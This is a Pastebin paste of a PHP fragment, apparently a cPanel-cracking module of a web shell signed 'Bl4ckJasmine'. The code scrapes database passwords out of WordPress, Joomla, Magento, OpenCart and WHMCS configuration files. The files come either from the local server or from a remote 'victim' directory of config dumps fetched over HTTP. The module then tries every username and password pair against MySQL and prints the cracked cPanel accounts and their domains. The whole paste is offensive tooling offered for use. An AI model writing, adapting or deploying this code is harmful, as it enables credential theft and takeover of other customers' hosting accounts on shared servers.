Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- elseif($_GET['njing'] == 'cpanel') {
- if($_POST['crack']) {
- $usercp = explode("\r\n", $_POST['user_cp']);
- $passcp = explode("\r\n", $_POST['pass_cp']);
- $i = 0;
- foreach($usercp as $ucp) {
- foreach($passcp as $pcp) {
- $connect = mysql_connect('localhost', $ucp, $pcp);
- if($connect) {
- if($_SESSION[$ucp] && $_SESSION[$pcp]) {
- } else {
- $_SESSION[$ucp] = "1";
- $_SESSION[$pcp] = "1";
- if($ucp === '' || $pcp === '') {
- //
- } else {
- $i++;
- print "username (".color(1, 2, $ucp).") password (".color(1, 2, $pcp).") domain (";
- if(!function_exists('posix_getpwuid')) print color(1, 1, "Function is Disable by System!");
- if(!getdomainname()) print color(1, 1, "Can't get domain name");
- foreach(getdomainname() as $domain) {
- $userdomain = (object) @posix_getpwuid(@fileowner("/etc/valiases/$domain"));
- $userdomain = $userdomain->name;
- if($userdomain === $user) {
- print "<a href='http://$domain/' target='_blank'>".color(1, 2, $domain)."</a><br>";
- break;
- }
- }
- print (empty($domain)) ? color(1, 1, "Can't get domain name.") : color(1, 2, $domain);
- print ")<br>";
- }
- }
- mysql_close($connect);
- }
- }
- }
- print ($i === 0) ? "" : "<p>".color(1, 3, "u found $i cPanel by Bl4ckJasmine")."</p>";
- } else {
- print "<center>
- <form method='post'>
- USER: <br>
- <textarea style='width: 450px; height: 150px;' name='user_cp'>";
- print implode("\n", getuser());
- print "</textarea><br>
- PASS: <br>
- <span>Grab Password from Link Config:</span><br>
- <input style='width: 425px; background: transparent; border: 1px solid #ffffff; color: #ffffff;' type='text' name='linkpass' placeholder='victim/blacksym/'>
- <input style='background: transparent; border: 1px solid #ffffff; color: #ffffff;' type='submit' name='submitlink' value='>>'>
- <br>
- <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
- if(isset($_POST['submitlink'])) {
- $getpass = $_POST['linkpass'];
- $get = curl($_POST['linkpass'])['response'];
- preg_match_all('/<a href="(.*?).txt">/', $get, $link);
- foreach($link[1] as $link_config) {
- $scandir[] = "$link_config.txt";
- }
- }
- else {
- $getpass = path();
- $scandir = scandir($getpass);
- }
- $password = "";
- foreach($scandir as $files) {
- $file = "$getpass/$files";
- $config = file_get_contents($file);
- if(preg_match("/WordPress/", $config)) {
- $password .= getValue($config, "DB_PASSWORD', '", "'")."\n";
- }
- elseif(preg_match("/JConfig|joomla/", $config)) {
- $password .= getValue($config, "password = '", "'")."\n";
- }
- elseif(preg_match("/Magento|Mage_Core/", $config)) {
- $password .= getValue($config, "<password><![CDATA[", "]]></password>")."\n";
- }
- elseif(preg_match("/panggil fungsi validasi xss dan injection/", $config)) {
- $password .= getValue($config, 'password = "', '"')."\n";
- }
- elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $config)) {
- $password .= getValue($config, "'DB_PASSWORD', '", "'")."\n";
- }
- elseif(preg_match("/^[client]$/", $config)) {
- preg_match("/password=(.*?)/", $config, $pass);
- if(preg_match('/"/', $pass[1])) {
- $pass[1] = str_replace('"', "", $pass[1]);
- $password .= $pass[1]."\n";
- }
- else {
- $password .= $pass[1]."\n";
- }
- }
- elseif(preg_match("/cc_encryption_hash/", $config)) {
- $password .= getValue($config, "db_password = '", "'")."\n";
- }
- }
- print $password;
- print "</textarea><br>
- <input style='background: transparent; color: #ffffff; border: 1px solid #ffffff; width: 460px;' type='submit' name='crack' value='Crack'>
- </form></center>";
- }
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement